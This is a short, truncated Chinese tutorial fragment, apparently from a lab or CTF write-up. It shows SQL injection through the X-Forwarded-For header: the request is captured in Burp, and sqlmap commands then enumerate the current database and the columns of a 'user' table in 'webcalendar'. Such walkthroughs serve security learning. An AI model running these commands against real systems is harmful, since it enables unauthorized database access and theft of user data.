1.首先打开burp抓包，添加x-forwarded-for:*，将raw的信息存为txt文件，如下图所示 2.爆出当前的数据库 sqlmap -r 1.txt --current-db --batch 3.爆表名 sqlmap -r 1.txt -D webcalendar -T user --columns --batch 4.爆...